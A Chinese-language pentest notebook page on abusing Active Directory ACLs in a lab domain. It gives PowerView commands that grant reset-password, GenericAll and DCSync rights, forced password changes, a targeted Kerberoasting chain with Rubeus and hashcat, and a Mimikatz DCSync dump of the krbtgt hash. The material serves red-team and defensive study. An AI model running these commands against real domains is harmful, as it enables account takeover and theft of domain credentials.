# DACL滥用On\_User\&DCSync

#### On User

这里是让给test1对fileserver有完全控制权限

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FfjrjOFWKfemuvPLvHUQD%2F1673315252905.png?alt=media&#x26;token=3e5c8c46-6b83-415e-9fd6-87d0dcc6852d" alt=""><figcaption></figcaption></figure>

![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673315252905.png)

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F37eRFjackJf3DCjkXmrA%2F1673317076574.png?alt=media&#x26;token=100cd492-58c7-4e7b-bbba-3ad2d397f981" alt=""><figcaption></figcaption></figure>

![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673317076574.png)

**Change Password**

* 所有可利用权限：

  * GenericAll
  * WriteDACL

    ```
    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity
     test1 -Rights ResetPassword -Verbose
    # 使用writeDACL添加强制改密码的权限
    ```

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F3GW7aGTqPL2i0nxxsYoH%2F1673343278112.png?alt=media&#x26;token=0bae58c4-49b5-4b29-9c14-bd8085d3dec0" alt=""><figcaption></figcaption></figure>

    ![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673343278112.png)
  * 所有扩展权限，powerview枚举出来的如果没有给详细的扩展权限就是拥有所有的扩展权限
  * 强制更改密码(重置密码)，powerview枚举出来的ObjectAceType为00299570-246d-11d0-a768-00aa006e0529

  **拥有GenericAll才能使用`net user`来更改密码，否则要使用admod**

```cmd
net user fileserver "QWEasd1234" /domain
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FzIPJhsYAAB2M1npXwk2m%2F1673315363046.png?alt=media&#x26;token=b2928c95-da29-4abe-800e-76f4bd5ec575" alt=""><figcaption></figcaption></figure>

![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673315363046.png)

```
admod  -b CN=fileserver,CN=Users,DC=fbi,DC=gov unicodepwd::QWEasd123456 -optenc
# 更改密码为QWEasd123456
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FScM6tjWzVro3UXW3PTlf%2F1673340631620.png?alt=media&#x26;token=b12d06b3-fdad-428a-b240-0524ae7362c4" alt=""><figcaption></figcaption></figure>

![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673340631620.png)

**Add SPN (Kerberoasting)**

* 所有可利用权限：
  * GenericAll
  * GenericWrite
  * WriteProperty
  * WriteOwner
  * WriteDACL

    ```
    Add-DomainObjectAcl -TargetIdentity "CN=fileserver,CN=Users,DC=fbi,DC=gov" -PrincipalIdentity
     test1 -Rights all -Verbose
     # 添加GenericAll
    ```

```
Set-DomainObject -Credential $creds -Identity fbi\fileserver -Set @{serviceprincipalname="MS
SQL/Sqllserver"}
# 给fileserver用户设置spn，因为与机器同名所有使用fbi\fileserver区分机器

.\Rubeus.exe kerberoast /user:fileserver /nowrap
# 获取hash

Set-DomainObject -Credential $creds -Identity fbi\fileserver -Clear serviceprincipalname -Ver
bose
# 清除spn
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FKwGSTdDGM1YvVjjZYZNh%2F1673318161007.png?alt=media&#x26;token=5eed9204-4487-4ea5-b7c8-d36b2f7377ce" alt=""><figcaption></figcaption></figure>

![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673318161007.png)

获取hash拿到hashcat破解即可

```
hashcat.exe -m 13100 spnhash.txt pwd.txt --force
```

#### DCSync

**配置**

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FpfUrzKbutsvKXw058pC6%2F1673354284133.png?alt=media&#x26;token=3771a6b0-6de2-4986-9778-02b76d2acbfe" alt=""><figcaption></figcaption></figure>

![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673354284133.png)

**利用**

```
lsadump::dcsync /domain:fbi.gov /user:krbtgt
```

* 所有可利用权限
  * GenericAll
  * 所有扩展权限
  * 复制目录更改所有项(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)+复制目录更改(1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F9hgI5ZbrtnyByU1nYlmS%2F1673354203336.png?alt=media&#x26;token=082016c7-b9cc-45f1-975c-7b340510a3ae" alt=""><figcaption></figcaption></figure>

    ![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673354203336.png)
  * WriteDACL

    ```
    Add-DomainObjectAcl -TargetIdentity "DC=fbi,DC=gov" -PrincipalIdentity test1 -Rights DCSync -Verbose
    # 给test1用户添加DCSync权限，这里额外添加了 正在复制筛选集中的目录更改 权限，经过测试是不需要这个权限的
    ```

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FNEfIMuhzEnHiHlyHpR6J%2F1673354628549.png?alt=media&#x26;token=3530d6a1-4826-42b2-9566-f683b3056f9c" alt=""><figcaption></figcaption></figure>

    <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FmlFOqfgAHZ6cg2SDwA1E%2F1673354713699.png?alt=media&#x26;token=f2687ac6-aefb-4951-b1e7-201c95636ef3" alt=""><figcaption></figcaption></figure>

    ![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673354628549.png)

    ![](https://c/Users/ice/Desktop/Rain1_lce/%E5%9B%BE%E7%89%87/1673354713699.png)